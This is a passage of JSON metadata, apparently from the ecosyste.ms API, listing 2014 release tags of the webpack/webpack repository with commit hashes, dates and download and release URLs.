pi/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta6/manifests"},{"name":"v1.2.0-beta5","sha":"2b6bfde9d5d634e47558c6f6b8589622a1fb6062","kind":"commit","published_at":"2014-05-26T21:54:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta5/manifests"},{"name":"v1.2.0-beta4","sha":"4ead6596a9a96dcde6f827ce1dce77c36701f113","kind":"commit","published_at":"2014-05-26T10:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta4/manifests"},{"name":"v1.2.0-beta3","sha":"36803b52719fa8f07d21c5fbab90f26a8b1f2bed","kind":"commit","published_at":"2014-05-22T10:17:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta3/manifests"},{"name":"v1.2.0-beta2","sha":"8ddfa0a950520306bb8694071d168a0d2a7a18a2","kind":"commit","published_at":"2014-05-21T16:34:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta2/manifests"},{"name":"v1.2.0-beta1","sha":"943a17c027279833e03a1b62fa60417cf4a5a5ac","kind":"commit","published_at":"2014-05-21T05:49:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta1/manifests"},{"name":"v1.1.11","sha":"2898f870eaeefcf0b60885743df8da9362883d63","kind":"commit","published_at":"2014-05-16T23:00:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.11/manifests"},{"name":"v1.1.10","sha":"7824ed8e29961197f3d74a755820f7b31fa01b5b","kind":"commit","published_at":"2014-05-08T16:44:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.10/manifests"},{"name":"v1.1.9","sha":"613e6a0bd0b4ca24791d01b3131b98533e33ff3a","kind":"commit","published_at":"2014-05-08T07:35:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.9/manifests"},{"name":"v1.1.8","sha":"adf3108a785630cd46daff093a80eb78f507a3a5","kind":"commit","published_at":"2014-04-19T19:36:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.8/manifests"},{"name":"v1.1.7","sha":"0ed9c759926ac0f7ec9be10643522657c6b4af53","kind":"commit","published_at":"2014-04-17T07:56:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.7/manifests"},{"name":"v1.1.6","sha":"504cb48e8fbd298fc6fa89f4fce99f30f8c072d1","kind":"commit","published_at":"2014-04-17T06:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.6/manifests"},{"name":"v1.1.5","sha":"32df8b73092c4fb59965f14ff833dfe70ba4940e","kind":"commit","published_at":"2014-04-09T07:12:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.5/manifests"},{"name":"v1.1.4","sha":"d6aa7b1388a3fe4b1a3b146a4986bb2b5ea99d03","kind":"commit","published_at":"2014-04-05T16:11:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.4/manifests"},{"name":"v1.1.3","sha":"5dcf54c1d4885d50625d799625c14123fd412fe1","kind":"commit","published_at":"2014-04-03T17:47:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.3/manifests"},{"name":"v1.1.2","sha":"fece5aee86748f0f230176aa25d9a7334e91be3d","kind":"commit","published_at":"2014-03-31T09:33:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.2/manifests"},{"name":"v1.1.1","sha":"67cae9333cd53eb29efd32944961172313d9e49a","kind":"commit","published_at":"2014-03-31T06:50:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.1/manifests"},{"name":"v1.1.0","sha":"5154409d669d871540b8052c1173244cdc1a1aa1","kind":"commit","published_at":"2014-03-25T09:31:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0/manifests"},{"name":"v1.1.0-beta12","sha":"256baf487179c7dee8254e716cd7f9d0db84842f","kind":"commit","published_at":"2014-03-21T15:22:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta12/manifests"},{"name":"v1.1.0-beta11","sha":"8af61319cbe22cb17a406180d94faab54b39a7f6","kind":"commit","published_at":"2014-03-20T07:38:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta11/manifests"},{"name":"v1.1.0-beta10","sha":"b1d5ed3dd6f84ee29070795d2b269a2a03a57c57","kind":"commit","published_at":"2014-03-19T21:16:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta10/manifests"},{"name":"v1.1.0-beta9","sha":"410c1f5bf82e66b9faaa7dbe2d9b58538c86b0e7","kind":"commit","published_at":"2014-03-18T21:45:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta9/manifests"},{"name":"v1.1.0-beta8","sha":"48ace947f915a9388b87119d43afb4e5580c2ed8","kind":"commit","published_at":"2014-03-12T22:03:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta8/manifests"},{"name":"v1.1.0-beta7","sha":"06056a40bee6fc843d15b854f6b0c7bacc381ac6","kind":"commit","published_at":"2014-03-12T21:30:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta7/manifests"},{"name":"v1.1.0-beta6","sha":"5ab7bf35ae2ad2ba1defe4cee4c5ab46679f1534","kind":"commit","published_at":"2014-03-11T17:43:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta6/manifests"},{"name":"v1.1.0-beta5","sha":"00c11cb7c27dfb416e36cf21200bad0c86cea34c","kind":"commit","published_at":"2014-03-11T15:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta5/manifests"},{"name":"v1.1.0-beta4","sha":"8ec37911f52b476f57e75480e642c7932dc43112","kind":"commit","published_at":"2014-03-10T13:00:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta4/manifests"},{"name":"v1.1.0-beta3","sha":"4a47a7add67c38faec552ae0e06da7632758c022","kind":"commit","published_at":"2014-03-07T16:08:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta3/manifests"},{"name":"v1.1.0-beta2","sha":"65ac850ab7b425a5c2264bd60a91fdf9b1e891ea","kind":"commit","published_at":"2014-03-05T19:10:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta2/manifests"},{"name":"v1.1.0-beta1","sha":"b27540e27bc34809110b180a19a3e56537aeb8df","kind":"commit","published_at":"2014-03-03T14:21:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta1/manifests"},{"name":"v1.0.5","sha":"09afa4749babcfc8dd4aa2866b385c27cf00ce59","kind":"commit","published_at":"2014-03-01T19:07:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.5/manifests"},{"name":"v1.0.4","sha":"b88938ceea7f2017723f2baf21d604ce726b2c4a","kind":"commit","published_at":"2014-03-01T12:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.4/manifests"},{"name":"v1.0.3","sha":"f172af367494f70acdb194adca1624df9bee05c5","kind":"commit","published_at":"2014-02-27T08:20:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.3/manifests"},{"name":"v1.0.1","sha":"c5f3bdec73c8efcf0179fe966230c652e8111557","kind":"commit","published_at":"2014-02-24T14:07:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.1/manifests"},{"name":"v1.0.0","sha":"5530e3784dbad2952ce210a7ad4fa5e87b7c14c2","kind":"commit","published_at":"2014-02-19T22:09:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc12","sha":"b1092b01f39e4de332dd63ce0deb51ad2af18bfc","kind":"commit","published_at":"2014-02-15T10:29:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc12/manifests"},{"name":"v1.0.0-rc11","sha":"1640c651604417d6169a3cbd0d11ad8f592e2c70","kind":"commit","published_at":"2014-02-14T11:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc11/manifests"},{"name":"v1.0.0-rc10","sha":"4f8ef991f1e7e5256fc061adbd8ba095c84c0d26","kind":"commit","published_at":"2014-02-14T09:07:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc10/manifests"},{"name":"v1.0.0-rc9","sha":"820f304a9a77ae33bbe17d6eaac10595e5434543","kind":"commit","published_at":"2014-02-13T16:32:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc9/manifests"},{"name":"v1.0.0-rc8","sha":"254c81c6afa7ac18030ab4bf3e37ab37ffbf1ea0","kind":"commit","published_at":"2014-02-13T10:42:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc8/manifests"},{"name":"v1.0.0-rc7","sha":"78810b969193cf153b2f1c56c06d637f10afb6f4","kind":"commit","published_at":"2014-02-12T13:53:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc7/manifests"},{"name":"v1.0.0-rc6","sha":"fa6f328f8210f28153d1cd86e1e7fa2da0e39d57","kind":"commit","published_at":"2014-02-12T08:00:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc6/manifests"},{"name":"v1.0.0-rc5","sha":"7044c7a0f88a3f8645541330a9f235f66526b6ad","kind":"commit","published_at":"2014-02-11T12:30:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc5/manifests"},{"name":"v1.0.0-rc4","sha":"6b7c23fb3181fa118a69ba3e320eb9ff57f249a4","kind":"commit","published_at":"2014-02-11T11:25:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc4/manifests"},{"name":"v1.0.0-rc3","sha":"60684612b21b2f9481073fade5dbf0b0743fe833","kind":"commit","published_at":"2014-02-05T11:37:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"81d90ac4b8860ebb9ab3e5485a804becbd18c1ca","kind":"commit","published_at":"2014-02-05T11:05:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositorie